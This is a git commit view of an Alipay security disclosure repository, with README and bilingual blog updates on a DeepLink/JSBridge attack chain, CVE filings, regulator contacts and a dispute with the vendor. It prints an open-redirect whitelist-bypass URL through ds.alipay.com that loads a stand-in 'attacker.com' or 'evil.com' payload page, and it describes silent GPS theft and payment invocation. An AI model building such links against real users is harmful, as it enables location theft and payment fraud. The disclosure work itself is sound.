icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

Add whitelist bypass emphasis, WeChat articles, official update declaration

Browse Source 
- Add whitelist bypass banner (CVSS 9.3) prominently at top of blog
- Add official declaration: updates only via innora.ai/zfb/ and WeChat AI-security-innora
- Add 4 WeChat article links with titles at blog header
- Sanitize case reference numbers from blog content
- Update CSSF to 4 departments confirmed (ICT Risk Supervision)
- Update response count to 39+
- Add rebuttal.html (legal defense document)
- Update README with CVE info, global regulatory response, whitelist bypass details

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
feng
2026-03-14 09:12:47 +08:00
parent 435a125f78
commit 72ae043493
4 changed files with 1249 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

68
README.md
View File

@@ -1,11 +1,51 @@
# Alipay DeepLink + JSBridge Security Research
**17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries**
**17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries | 6 CVEs Applied**
> **⚠️ Official Update Channels**: All updates are published exclusively at:
> 1. **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/)
> 2. **WeChat**: Official Account **AI-security-innora**
>
> Content from any other source is not authorized by our team.
## WeChat Articles
| Tag | Title | Link |
|-----|-------|------|
| 🆕 NEW | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | [Read](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw) |
| 🔥 HOT | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | [Read](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg) |
| ⚖️ LEGAL | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权" | [Read](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw) |
| 📱 ORIGINAL | 位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐 | [Read](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q) |
## Critical Finding: Whitelist Bypass (CVSS 9.3)
**The master key enabling all 17 vulnerabilities to be remotely exploitable by ANYONE:**
```
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html
```
- **No developer permissions required** — No Alipay Open Platform registration, no Mini Program credentials, no approval
- **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack remotely against 1B+ users
- **Vendor acknowledged severity** — Ant Group stated "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor still refuses to patch, calling it "normal functionality"
- **6 CVEs applied** via MITRE (Ticket #2005801), including this bypass as highest-severity (CWE-601 + CWE-939)
## Full Report
- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/)
- **GitHub Mirror**: This repository
- **GitHub**: This repository
## Global Regulatory Response
Reported to ~160 agencies across 22 countries. Active investigations by:
- **Apple Product Security** — Active investigation
- **Google Play** — Policy violation investigation
- **MITRE CVE** — 6 CVEs applied (Ticket #2005801)
- **CSSF Luxembourg** — 4 departments confirmed receipt, ICT Risk Supervision noted contents
- **Singapore PDPC** — Formal data protection investigation
- **HKMA Hong Kong** — SVF licence compliance inquiry
- **CIRCL Luxembourg** — Contacting Alibaba SRC on our behalf
- **Packet Storm Security** — Advisory published (ID 217089)
## Summary
@@ -15,20 +55,20 @@ This repository documents a comprehensive security research project that uncover
| Severity | Count | Examples |
|----------|-------|---------|
| **CRITICAL** | 3 | GPS silent theft, Transfer pre-fill, Payment initiation |
| **HIGH** | 6 | Device fingerprinting, UI spoofing, Session leak |
| **CRITICAL** | 4 | Whitelist bypass (CVSS 9.3), GPS silent theft, Transfer pre-fill, Payment initiation |
| **HIGH** | 5 | Device fingerprinting, UI spoofing, Session leak |
| **MEDIUM** | 8 | Network info, Chain WebView, Scheme injection |
### Attack Chain
```
External SMS/QQ/WeChat Link
Browser opens alipays:// DeepLink
→ Alipay launches with attacker's URL in WebView
AlipayJSBridge APIs exposed to external page
Silent data collection (GPS, device info, session)
Attacker crafts URL (NO developer permissions needed)
ds.alipay.com open redirect bypasses whitelist
→ Alipay WebView loads attacker's page with full JSBridge access
Silent data collection (GPS 8.8m accuracy, device info, session)
Payment interface invocation (tradePay)
→ UI spoofing (title bar, toast notifications)
→ Sensitive page navigation (transaction history, transfer)
→ Sensitive page navigation (transaction history, transfer, assets)
```
### Cross-Platform Verification
@@ -53,11 +93,19 @@ External SMS/QQ/WeChat Link
| 2026-03-07 | Full report V3 sent with 17 vulnerabilities + 308 log entries |
| 2026-03-10 | Ant Group response: "These are normal features" (正常功能) |
| 2026-03-11 | Public disclosure after vendor declined to acknowledge |
| 2026-03-11 | Ant Group's law firm filed WeChat complaint (dismissed by platform) |
| 2026-03-12 | Packet Storm Security published advisory (ID 217089) |
| 2026-03-12 | 6 CVE IDs applied via MITRE (Ticket #2005801) |
| 2026-03-12~14 | ~170 emails sent to ~160 regulatory agencies across 22 countries |
| 2026-03-13 | HKMA, PDPC, CSSF, Apple, Google, CIRCL confirmed receipt/investigation |
| 2026-03-14 | Whitelist bypass (CVSS 9.3) highlighted as master key finding |
## Repository Structure
```
├── index.html # Full bilingual (CN/EN) research blog
├── rebuttal.html # Legal rebuttal to lawyer's complaint
├── wechat_article.html # WeChat public account article
├── poc/
│ ├── trigger.html # Attack trigger simulation page
│ ├── verify.html # JSBridge exploitation PoC

685
index.html
View File

@@ -461,6 +461,135 @@ body.lang-en .en { display: block; }
</div>
</div>
<!-- ==================== OFFICIAL UPDATE DECLARATION + WECHAT ARTICLES ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(68,136,255,.08), rgba(153,102,255,.06));border:2px solid #4488ff;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:3px;background:linear-gradient(90deg,#4488ff,#9966ff,#4488ff);"></div>
<h2 style="color:#4488ff;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="zh">📢 官方声明 &amp; 微信公众号文章</span>
<span class="en">📢 Official Statement &amp; WeChat Articles</span>
</h2>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:14px 16px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:1.8;">
<strong style="color:#ff4444;">⚠️ 重要声明:</strong>本研究的所有后续更新<strong>仅通过以下两个官方渠道发布</strong><br>
1⃣ 本页面(<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code><br>
2⃣ 微信公众号 <strong style="color:#4488ff;">AI-security-innora</strong><br>
其他任何渠道发布的内容均非本团队授权,请勿轻信。
</span>
<span class="en" style="color:#ff8888;font-size:14px;line-height:1.8;">
<strong style="color:#ff4444;">⚠️ Important:</strong> All future updates to this research are published <strong>exclusively through two official channels</strong>:<br>
1⃣ This page (<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code>)<br>
2⃣ WeChat Official Account: <strong style="color:#4488ff;">AI-security-innora</strong><br>
Content from any other source is not authorized by our team.
</span>
</div>
<div style="display:grid;gap:10px;">
<a href="https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#ff4444;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">NEW</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span>
<span class="en">When Whitelist Bypass Becomes the Master Key — Arrogance Ends at the Courtroom</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析</span>
<span class="en">Vol.19 — Global regulatory notification to 160 agencies + complete whitelist bypass analysis</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#ff6b35;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">HOT</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span>
<span class="en">Tech Giant's "Gag Order" Rejected by WeChat, Packet Storm Delivers Final Verdict</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089)</span>
<span class="en">Vol.15 — WeChat complaint dismissed + Packet Storm published (ID 217089)</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#9966ff;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">LEGAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span>
<span class="en">Alipay Research Hit with Lawyer's Letter — How Does Zero Mentions Constitute "Reputation Infringement"?</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">完整法律申诉 — 逐条回应投诉方三项"不实信息"主张</span>
<span class="en">Full legal defense — point-by-point rebuttal of all three "false information" claims</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#44cc88;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">ORIGINAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span>
<span class="en">Location Stolen Instantly! 17 "Normal Features" in a Payment App Used by 1B+ People</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">原始技术分析 — 17个漏洞 + 308条日志 + 42张截图 + 3台设备跨3国验证</span>
<span class="en">Original analysis — 17 issues + 308 logs + 42 screenshots + 3 devices across 3 countries</span>
</div>
</a>
</div>
</div>
</div>
<!-- ==================== CRITICAL: WHITELIST BYPASS BANNER ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,107,53,.08));border:2px solid #ff4444;border-radius:12px;padding:28px 28px 24px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff4444,#ff6b35,#ff4444);"></div>
<h2 style="color:#ff4444;font-size:22px;margin:0 0 16px 0;text-align:center;">
<span class="zh">⚠️ 核心发现:白名单绕过 — 任何人无需任何权限即可远程利用 (CVSS 9.3)</span>
<span class="en">⚠️ Key Finding: Whitelist Bypass — Remotely Exploitable by Anyone, No Permissions Required (CVSS 9.3)</span>
</h2>
<div class="zh">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">这是整个攻击链的钥匙。</strong>支付宝使用域名白名单限制 WebView 中可加载的页面。但其自有域名 <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> 存在开放重定向漏洞,允许攻击者通过白名单域名跳转加载任意恶意页面。<strong>没有此绕过,其余漏洞仅限局域网;有了它,人人可远程利用。</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">不需要任何开发者权限。</strong>不需要注册支付宝开放平台、不需要小程序开发者资格、不需要任何审批。攻击者只需构造一条 URL通过微信、WhatsApp、短信或任何即时通讯工具发送给受害者。</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17个漏洞因此从"理论"变为"实战"。</strong>攻击者页面一旦加载到支付宝 WebView 中,即获得完整的 JSBridge API 访问权限——<strong>静默窃取 GPS 坐标、调用支付接口、打开相机、伪造 UI</strong>——全部通过一条链接完成。</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">厂商自己承认严重性。</strong>蚂蚁集团安全团队在与我们的通话中明确表示:<em>"如果能绕过我们的白名单限制,那就严重了"</em>。通话结束后不到 2 分钟,白名单即被绕过。<strong>厂商确认了严重性,但至今拒绝修复,称其为"正常功能"。</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// 任何人都可以构造的攻击链接:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
<div class="en">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">This is the master key to the entire attack chain.</strong> Alipay uses a domain whitelist to restrict pages loadable in its WebView. However, its own domain <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> has an open redirect vulnerability, allowing attackers to load arbitrary malicious pages through the whitelisted domain. <strong>Without this bypass, other vulnerabilities are LAN-only; with it, anyone can attack remotely.</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">No developer permissions required.</strong> No Alipay Open Platform registration, no Mini Program developer credentials, no approval process. An attacker simply crafts a URL and sends it via WeChat, WhatsApp, SMS, or any messaging app.</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17 vulnerabilities go from "theoretical" to "in-the-wild."</strong> Once the attacker's page loads inside Alipay's WebView, it gains full JSBridge API access — <strong>silently steal GPS coordinates, invoke payment interfaces, access the camera, spoof UI elements</strong> — all through a single link.</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">The vendor acknowledged the severity.</strong> Ant Group's security team stated during our call: <em>"If you can bypass our whitelist, that would be serious."</em> Less than 2 minutes after the call ended, the whitelist was bypassed. <strong>The vendor confirmed it was serious, yet still refuses to patch, calling it "normal functionality."</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// Attack URL anyone can construct:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
</div>
</div>
<div class="container">
<!-- ==================== META ==================== -->
@@ -568,36 +697,85 @@ body.lang-en .en { display: block; }
<div class="timeline-item">
<div class="timeline-date">2026-02-25</div>
<p>
<span class="zh"><strong>第一次报告</strong> — TLS/SSL 安全分析报告发送至 bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com</span>
<span class="en"><strong>First Report</strong> — TLS/SSL security analysis sent to bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com</span>
<span class="zh"><strong>第一次报告</strong> — TLS/SSL 中间人攻击 + 设备指纹问题,通过厂商安全应急响应中心(SRC)提交<br><em style="opacity:.7;font-size:.9em;">注:此次报告的是 TLS/SSL 相关问题DeepLink/JSBridge 攻击链尚未发现</em></span>
<span class="en"><strong>First Report</strong> — TLS/SSL MITM + device fingerprinting issues submitted via vendor's Security Response Center (SRC)<br><em style="opacity:.7;font-size:.9em;">Note: This report covered TLS/SSL issues only; the DeepLink/JSBridge attack chain had not yet been discovered</em></span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-06</div>
<p>
<span class="zh">综合安全分析完成,包含 SecurityGuard、BabaSSL、DexAOP 等模块的深度分析</span>
<span class="en">Comprehensive analysis completed covering SecurityGuard, BabaSSL, DexAOP and more</span>
<span class="zh"><strong>AntSRC 回复</strong>"经过我们安全工程师审核,无法被实际利用"</span>
<span class="en"><strong>AntSRC Reply</strong>: "After review by our security engineers, [the issues] cannot be practically exploited"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07</div>
<div class="timeline-date">2026-03-07 04:08</div>
<p>
<span class="zh"><strong>第二次报告</strong> — DeepLink + JSBridge 8个漏洞的完整攻击链报告发送至蚂蚁集团联系</span>
<span class="en"><strong>Second Report</strong> Full DeepLink + JSBridge attack chain report (8 issues) sent to Ant Group contact</span>
<span class="zh"><strong>第二次报告</strong> 发现 DeepLink+JSBridge 攻击链,提交 8 个漏洞2 CRITICAL + 4 HIGH发送至厂商安全团队对接</span>
<span class="en"><strong>Second Report</strong> — DeepLink+JSBridge attack chain discovered, 8 issues (2 CRITICAL + 4 HIGH) sent to vendor security contact</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07</div>
<div class="timeline-date">2026-03-07 06:07</div>
<p>
<span class="zh"><strong>第三次报告</strong>V3增强版17个漏洞 + 308条服务器日志 + 42张截图</span>
<span class="en"><strong>Third Report</strong>V3 enhanced, 17 issues + 308 server logs + 42 screenshots</span>
<span class="zh"><strong>第三次报告V3</strong>扩展至 17 个漏洞,含资金操作风险 + 308 条服务器日志 + 42 张截图</span>
<span class="en"><strong>Third Report (V3)</strong>Expanded to 17 issues including financial operation risks + 308 server logs + 42 screenshots</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07</div>
<div class="timeline-date">2026-03-07 07:54</div>
<p>
<span class="zh"><strong>第四次报告</strong> — 端到端外部攻击报告含Samsung S25 Ultra + iPhone 16 Pro跨平台验证</span>
<span class="en"><strong>Fourth Report</strong> — E2E external attack report with cross-platform Samsung S25 Ultra + iPhone 16 Pro verification</span>
<span class="zh"><strong>第四次报告</strong> — 端到端外部攻击完整演示3 台设备跨国验证(新西兰/马来西亚/中国),含在线复现链接</span>
<span class="en"><strong>Fourth Report</strong> Full E2E external attack demo, 3 devices cross-country verification (NZ/MY/CN), with live reproduction URL</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 12:33</div>
<p>
<span class="zh"><strong>厂商回复</strong>"漏洞报告邮件已收到,我们会安排人尽快分析,完了给你回复"</span>
<span class="en"><strong>Vendor Reply</strong>: "Vulnerability report emails received, we will arrange someone to analyze ASAP and reply"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:25</div>
<p>
<span class="zh"><strong>微信语音通话15分46秒</strong> — 厂商安全业务负责人在通话中辩称"局域网内本来就对这些功能开放",试图将攻击面限定为局域网场景。并暗示:<strong>"如果能绕过我们的白名单限制,那就严重了"</strong>。此前所有测试确实在局域网环境下(研究员本机与测试手机 Xiaomi Redmi 12 在同一 WiFi 网络PoC 页面部署在 192.168.80.12:8888</span>
<span class="en"><strong>WeChat Voice Call (15m 46s)</strong> — Vendor security lead argued that "these features are designed to be open within LAN" and attempted to frame the attack surface as LAN-only. The lead implied: <strong>"If you can bypass our whitelist, that would be serious."</strong> All prior testing had indeed been on a local network (researcher's machine and Xiaomi Redmi 12 test phone on the same WiFi), with PoC pages hosted at 192.168.80.12:8888</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:36</div>
<p>
<span class="zh"><strong>白名单绕过 — 2 分钟内完成</strong> — 通话结束后不到 2 分钟,我们即绕过了厂商自以为安全的白名单机制。绕过方法:利用 <code>ds.alipay.com/?scheme=</code> 开放重定向参数。该域名 (ds.alipay.com) 本身在 Alipay WebView 的白名单中,其 <code>?scheme=</code> 参数接受任意 URL 跳转,攻击者可构造 <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code>URL 的 host 为白名单域名,但实际加载攻击者页面。<strong>这彻底否定了"局域网限定"的辩解</strong>——任何互联网上的页面都可以通过白名单域名跳转进入 Alipay WebView 并调用 JSBridge API</span>
<span class="en"><strong>Whitelist Bypass — Completed in Under 2 Minutes</strong> — Less than 2 minutes after the call ended, we bypassed the vendor's whitelist mechanism they believed was secure. Method: exploiting the <code>ds.alipay.com/?scheme=</code> open redirect parameter. The domain ds.alipay.com is itself whitelisted in Alipay's WebView, and its <code>?scheme=</code> parameter accepts arbitrary URL redirects. An attacker can craft <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code> — the URL host is a whitelisted domain, but it actually loads the attacker's page. <strong>This completely invalidated the "LAN-only" defense</strong> — any page on the internet can use the whitelisted domain redirect to enter Alipay's WebView and invoke JSBridge APIs</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:01</div>
<p>
<span class="zh"><strong>公网 PoC 部署 + 第二次语音通话7分07秒</strong> — 将 PoC 部署至公网 <code>https://innora.ai/sec/trigger.html</code>(触发页)和 <code>https://innora.ai/sec/verify.html</code>(载荷页),发送给厂商安全人员验证。证明攻击在互联网环境下完全可行,不限于局域网</span>
<span class="en"><strong>Public PoC Deployment + Second Voice Call (7m 07s)</strong> — Deployed PoC to public internet at <code>https://innora.ai/sec/trigger.html</code> (trigger page) and <code>https://innora.ai/sec/verify.html</code> (payload page), sent to vendor security lead for verification. Proved the attack is fully viable over the internet, not limited to LAN</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:09</div>
<p>
<span class="zh"><strong>厂商安全人员亲测 — iPhone 从杭州连接</strong> — 服务器日志显示来自杭州(支付宝总部所在地)的 iPhone 17 Pro Max 连接GPS 定位 (30.3xxx, 120.1xxx) 精度 9.99m。设备有 2xxGB 存储、80% 电量。<strong>关键发现iOS 上有 18 个 JSBridge API 可用,比 Android (13 个) 多出 5 个高危 APItradePay、share、getLocation、scan、chooseImage</strong>。iOS 版 tradePay支付和 getLocation定位均可从外部页面直接调用而 Android 上这些 API 被拦截。这意味着 <strong>iOS 攻击面显著大于 Android</strong>,且 share API 可实现蠕虫式传播</span>
<span class="en"><strong>Vendor Security Lead Tests — iPhone Connects from Hangzhou</strong> — Server logs show iPhone 17 Pro Max connecting from Hangzhou (Alipay HQ city), GPS (30.3xxx, 120.1xxx) accuracy 9.99m. Device: 2xxGB storage, 80% battery. <strong>Critical discovery: 18 JSBridge APIs available on iOS vs 13 on Android — 5 additional high-risk APIs: tradePay, share, getLocation, scan, chooseImage</strong>. iOS tradePay (payment) and getLocation (GPS) can be invoked from external pages, while Android blocks them. This means <strong>iOS attack surface is significantly larger than Android</strong>, and the share API enables worm-like propagation</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:2817:03</div>
<p>
<span class="zh"><strong>V6 PoC + 多设备验证</strong> — 创建针对高影响力漏洞的 V6 版 PoC(1) 静默 GPS+设备指纹窃取 (2) 支付引导攻击 (3) UI 钓鱼 (4) 敏感页面跳转链 (5) share API 蠕虫传播iOS。测试账户因频繁触发风控被封锁委托新西兰朋友测试——正常触发。随后用妻子的 iPhone 验证——同样成功。厂商回复"OK我们分析下"</span>
<span class="en"><strong>V6 PoC + Multi-device Verification</strong> — Created V6 PoC targeting high-impact vulns: (1) silent GPS+device fingerprint theft (2) payment redirection attack (3) phishing UI (4) sensitive page redirect chains (5) share API worm propagation (iOS). Test account banned due to risk control triggers; delegated to friend in New Zealand — triggered successfully. Then verified with spouse's iPhone — also successful. Vendor replied "OK, let us analyze"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-08</div>
<p>
<span class="zh"><strong>厂商第二轮验证</strong> — 安全业务负责人在杭州使用 iPhone 16 Pro 进行更深入测试。全程无任何 GPS 授权声明/弹窗,页面加载到 GPS 数据回传仅约 7 秒。3 轮测试精度从 17.4m 递进至 9.99m 再到 8.81m<code>locationReducedAccuracy: 0</code>(精确定位模式)。此轮测试进一步确认了前日发现的 iOS 攻击面问题,且证实 GPS 外泄在用户完全无感知的情况下发生</span>
<span class="en"><strong>Vendor Second-round Verification</strong> — Security business lead conducted deeper testing in Hangzhou with iPhone 16 Pro. Zero GPS authorization dialogs appeared throughout; GPS data transmitted within ~7 seconds of page load. 3-round accuracy improved from 17.4m to 9.99m to 8.81m, with <code>locationReducedAccuracy: 0</code> (precise mode). This round further confirmed the iOS attack surface discovered the previous day, and verified GPS exfiltration occurs with zero user awareness</span>
</p>
</div>
<div class="timeline-item">
@@ -610,15 +788,103 @@ body.lang-en .en { display: block; }
<div class="timeline-item">
<div class="timeline-date">2026-03-10</div>
<p>
<span class="zh"><strong>厂商回应</strong>"正常功能" — 不认为是漏洞</span>
<span class="en"><strong>Vendor Response</strong>: "Normal functionality" — not considered a vulnerability</span>
<span class="zh"><strong>厂商最终回复</strong>"根据我们的评估,这些属于正常功能"</span>
<span class="en"><strong>Vendor Final Response</strong>: "Based on our assessment, these are normal functionality"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11</div>
<div class="timeline-date">2026-03-11 ~18:03</div>
<p>
<span class="zh"><strong>公开发布</strong> — 既然厂商确认这些都是"正常功能",那公开讨论"正常功能"的安全影响没有任何问题</span>
<span class="en"><strong>Public Disclosure</strong> — Since the vendor confirmed these are "normal features," discussing the security implications of "normal features" publicly is entirely appropriate</span>
<span class="zh"><strong>微信对话</strong>截图泰国时间17:03+1h=北京时间)— 厂商对接人确认"正常功能"定性(回复"嗯"),我方告知将公开讨论。对接人在对话中使用了"洞"一词,说明内部对发现的安全属性并非毫无认知</span>
<span class="en"><strong>WeChat Conversation</strong> (screenshot in Thai timezone 17:03, +1h = Beijing time) — Vendor contact confirmed "normal functionality" classification. We notified intent to publish. The contact used the colloquial term "洞" (vulnerability) in conversation, suggesting internal awareness of the security nature of these findings</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 18:16</div>
<p>
<span class="zh"><strong>公开发布</strong> — 厂商明确拒绝修复后,公开研究成果</span>
<span class="en"><strong>Public Disclosure</strong> — After vendor explicitly refused to fix, research published</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 22:45</div>
<p>
<span class="zh"><strong>法律投诉</strong> — 文章发布仅4小时后北京格韵律师事务所代理厂商向微信公众平台投诉我们的文章"内容侵犯名誉/商誉/隐私/肖像"。讽刺的是:<strong>我们的文章从头到尾未出现"支付宝""Alipay""蚂蚁集团"中的任何一个词</strong>。投诉方通过发起投诉,反而自行确认了文章描述的行为与其所代理的企业相关。我们已提交申诉。</span>
<span class="en"><strong>Legal Complaint </strong> — Just 4 hours after publication, Beijing Geyun Law Firm (representing the vendor) filed a "content infringing reputation/goodwill/privacy/likeness" complaint against our WeChat article. The irony: <strong>our article never once mentions "Alipay," "支付宝," or "Ant Group" anywhere in the entire text</strong>. By filing this complaint, the complainant effectively self-identified their client as the subject of the article. We have filed an appeal.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>CVE 提交6个漏洞等待确认中</strong> — 鉴于厂商阿里巴巴作为注册CNA编号CNA-2017-0006拒绝承认漏洞并拒绝分配CVE编号我们通过 MITRE CNA of Last Resort (CNA-LR) 路径分两批提交了6个独立CVE申请<br>
<strong>第一批5个</strong><br>
① DeepLink URL Scheme 访问控制绕过 (CWE-939, CVSS 9.1)<br>
② iOS GPS 静默外泄 — 无授权弹窗 (CWE-359, CVSS 7.4)<br>
③ iOS tradePay 未授权支付流程调用 (CWE-940, CVSS 8.6)<br>
④ UI 欺骗 — showToast/setTitle 伪造支付宝界面 (CWE-451, CVSS 8.1)<br>
⑤ 端到端敏感数据外泄 — 设备指纹+权限状态 (CWE-200, CVSS 8.6)<br>
<strong>第二批1个</strong><br>
⑥ ds.alipay.com 开放重定向绕过白名单机制 (CWE-601+CWE-939, CVSS 9.3) — 利用白名单域名 ds.alipay.com 的 <code>?scheme=</code> 参数实现开放重定向,彻底绕过厂商域名白名单防护,使任何互联网页面均可通过白名单域名跳转链进入 WebView 调用全部 JSBridge API。此绕过在与厂商安全团队通话期间 2 分钟内完成<br>
Credit: Jiqiang Feng (Innora AI Security Research)。等待 MITRE 回复确认中。</span>
<span class="en"><strong>CVE Submission (6 Vulnerabilities, Awaiting Confirmation)</strong> — Since the vendor (Alibaba, a registered CNA: CNA-2017-0006) refused to acknowledge the vulnerabilities and declined to assign CVE IDs, we submitted 6 independent CVE requests in two batches through MITRE's CNA of Last Resort (CNA-LR) pathway:<br>
<strong>Batch 1 (5 CVEs):</strong><br>
① DeepLink URL Scheme Access Control Bypass (CWE-939, CVSS 9.1)<br>
